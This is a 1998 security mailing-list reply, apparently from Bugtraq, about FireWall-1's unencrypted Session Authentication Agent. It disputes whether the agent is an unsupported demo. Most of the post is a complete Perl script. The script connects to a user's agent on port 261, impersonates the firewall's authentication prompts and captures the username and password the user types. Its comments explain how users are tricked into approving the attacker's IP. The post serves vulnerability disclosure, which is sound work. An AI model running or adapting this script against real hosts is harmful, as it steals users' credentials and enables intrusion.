Re: Firewall-1 3.0b Session Agent

[acd () WEIRDNESS NET (Andrew Danforth)]

On Fri, 25 Sep 1998, Brooke Paul wrote:

> > -----Original Message-----
> > From: Larry Pingree [SMTP:larryp () secure-it net]
> >
> > A problem exists in the Firewall-1 3.0b Session Agent
> >
> > All communications from the Firewall-1 Module to the session agent are
> > non-encrypted. Thus also allowing these communication to be snooped for
> > usernames and passwords.
>
>   I think it's worth noting that Checkpoint states that the included
> Session Agent is a 'demo' and not officially supported.  The real problem
> is the protocol they have defined.  Even if you attempt to write a secure
> version it wouldn't interoperate with the firewall.

Where is that stated?  I was unable to find any documentation stating that
the Authentication Agent is a demo.  I'd be surprised if they advertised
Session Auth as a feature yet claimed that their Agent wasn't supported...

Here's the script that Larry referred to.  I whipped it up during his FW-1
class, of all places... :)

---------- SNIP ----------
#!/usr/bin/perl -w
#
# This script connects to a FireWall-1 Session Authentication Agent
# running on Windows 95/NT.  It attempts to "authenticate" the remote
# user and returns the resulting username/password.
#
# The agent supports configuration of up to three IP addresses which
# are allowed to submit authentication requests.  If there are three
# addresses configured, the user is presented with the following when
# an unknown host connects:
#
#    "Authentication request from this IP Address is not allowed."
#                           [ OK ]
#
# If there are only one or two addresses allowed, the user gets this
# nice little dialog box:
#
#    "Do you want to enter this IP to the Firewall-1 list"
#              [ YES ] (default)          [ NO ]
#
# Guess which button your typical user will click on?
#
# If the agent closes the connection prematurely, you will get strange
# results.
#
# tested vs. FW-1 Authentication Agent 1.1
#
# Andrew Danforth <acd () weirdness net>

require 5.000;

use Socket;
use Getopt::Std;

$| = 1;

$FIREWALL_NAME = "Corporate Firewall";
$PASSWORD_PROMPT = "FireWall-1 password";
$PORT = 261;

die unless getopts('n:p:');

unless ($TARGET_IP = shift) {
   print "usage: $0 [-n firewall_name] [-p password_prompt] target_ip\n";
   exit(1);
}

$FIREWALL_NAME = $opt_n if (defined $opt_n);
$PASSWORD_PROMPT = $opt_p if (defined $opt_p);

socket(SOCK, AF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "socket: $!";
connect(SOCK, sockaddr_in($PORT, inet_aton($TARGET_IP))) || die "connect: $!";

select(SOCK); $| = 1; select(STDOUT);

print SOCK "220 FW-1 Session Authentication Request from $FIREWALL_NAME\n\r";
print "sent greeting\n";
print SOCK "331 User:\n\r";
print "sent user request\n";
$username = &get_response;
print "username entered: $username\n";
print SOCK "331 *$PASSWORD_PROMPT:\n\r";
$password = &get_response;
print "password entered: $password\n";
print SOCK "200 User $username authenticated by FireWall-1 authentication.\n\r";
print SOCK "230 OK\n\r";

sub get_response {
   # this is ugly but it works.  the session agent doesn't seem to send proper newlines.
   my $input;
   $input .= $key while($key = getc SOCK and ord($key));
   return $input;
}